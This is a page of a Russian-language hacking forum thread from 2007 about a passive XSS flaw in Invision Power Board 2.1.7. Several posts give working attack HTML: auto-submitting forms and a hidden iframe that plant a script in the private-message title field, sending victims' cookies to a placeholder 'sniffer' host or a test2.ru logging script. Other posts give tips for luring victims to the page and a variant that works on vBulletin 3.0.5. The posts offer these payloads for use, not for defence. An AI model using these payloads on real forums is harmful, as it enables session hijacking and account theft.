ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу IPB 2.1.7 passive XSS
   
Закрытая тема
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.02.2007, 14:54
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию
Цитата:
вопрос народ можети доделать первую html ку так чтобы она вписывала ник кому отправляется ПМ?
Добавь в ту html:


Код HTML:
<input type="hidden" name="entered_name" value="Nick">
Последний раз редактировалось Fr-Ron; 16.02.2007 в 15:08..
 

  #12  
Старый 16.02.2007, 14:59
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от _-[A.M.D]HiM@S-_  
Там есть еще через модера Xss
А с этого момента по подробней можно?)
 

  #13  
Старый 18.02.2007, 19:22
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
ну хз... я так обчно делал...

сорри время мало неуспел всё обрезать...
короче тестим

Цитата:
<html>
<body onload="p.submit()">
<FORM id=p name=REPLIER action=http://forum.xxx.xx/index.php?act=msg method=post>
<INPUT type=hidden value=0 name=removeattachid>
<INPUT type=hidden name=OID>
<INPUT type=hidden value=Msg name=act>
<INPUT type=hidden value=04 name=CODE>
<INPUT type=hidden value=01 name=MODE>

<INPUT type=hidden id=entered_name value="HAPPY" name=entered_name autocomplete="off">
<BR>
<INPUT type=hidden tabIndex=3 maxLength=40 value='"><script>navigate("http://XXXXXXX/sniffer.gif?".concat(document.cookie))</script>' size=40 name=msg_title></textarea></form>
 

  #14  
Старый 18.02.2007, 19:24
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
_GaLs_
точно не помню....
но смысл такой....

у модера или админа есть функция изменить данные юзера...
и там при изменении даты рождения поле не фильтруется
 

  #15  
Старый 19.02.2007, 11:44
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669

Репутация: 178
По умолчанию
А ещё если я не ошибаюсь ,то можно код выше разместить на ifolder.ru как шапку и на форум выложить ссылку на файл который расположен на ifolder. Ток чёт куки на приходят на лог.
Зарегистрировать акк можно здесь
Ток надо я думаю надо убрать перенаправление в скрипте.
Последний раз редактировалось GrAmOzEkA; 19.02.2007 в 14:16..
 

  #16  
Старый 20.02.2007, 00:19
spheere
Новичок
Регистрация: 24.05.2006
Сообщений: 13
Провел на форуме:
257517

Репутация: 16
По умолчанию
Лучше впаривать ссылку на страницу такого типа
Код HTML:
<html>
<body> 
здесь любой контент
<iframe width=0 height=0 frameborder=0 src="frame.htm">
</body>
</html>
А все "подозрительные" действия совершать во фрейме
Код HTML:
<html>
<body>
<form name="xss" action="http://test1.ru/ipb217/index.php" method="post">
<input type="hidden" name="act" value="Msg">
<input type="hidden" name="CODE" value="04">
<input type="hidden" name="MODE" value="01">
<input type="hidden" name="msg_title" value='"><script>document.location.href="http://test2.ru/xss/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>
Как на видео с ДЛ
 

  #17  
Старый 20.02.2007, 20:33
spheere
Новичок
Регистрация: 24.05.2006
Сообщений: 13
Провел на форуме:
257517

Репутация: 16
По умолчанию
_http://rapidshare.com/files/16889954/IPB_217_XSS.rar.html
пасс: dl
 

  #18  
Старый 21.02.2007, 01:06
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию
да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???
 

  #19  
Старый 21.02.2007, 08:47
KaMiKadZe
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257

Репутация: 103
По умолчанию
Цитата:
Сообщение от Taylorith  
да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???
Попробуй в java-скриптах поглядеть, я обычно там всегда версию находил (но не всегда она там правельная)
Вот в Античате я думаю версия не правильная
PHP код:
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.0.6
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000–2005 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| ############################[DGT-TEAM]############################## ||
\*======================================================================*/ 
Последний раз редактировалось KaMiKadZe; 21.02.2007 в 14:33..
 

  #20  
Старый 23.02.2007, 15:09
dante
Новичок
Регистрация: 28.01.2006
Сообщений: 3
Провел на форуме:
23336

Репутация: 0
По умолчанию
У меня получилось провернуть это на vbulletin 3.0.5. Спасибо dl и spheere за идею
Принцип тот же, вставляем ксс в поле "тема".
Дело в том, что на vbull скрипт срабатывал при нажатии кнопки"предварительный просмотр". Поэтому вместо form.submit() следует использовать
Код:
preview = document.getElementById("pre"); preview.click();
Естественно, предварительно добавив атрибут id кнопке предпросмотра.
 
Закрытая тема
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на Ipb 2.1.7 Thrasher Форумы 15 14.01.2007 14:51
Может кто нибудь определить префикс в Ipb 2.1.7 samurays Форумы 8 06.09.2006 19:42
XSS vbulletin and IPB v2.1.7 With IE liauliau Форумы 6 16.08.2006 15:19
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
XSS в форуме IPB (дополнение) (-=util=-) Форумы 0 13.01.2005 22:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ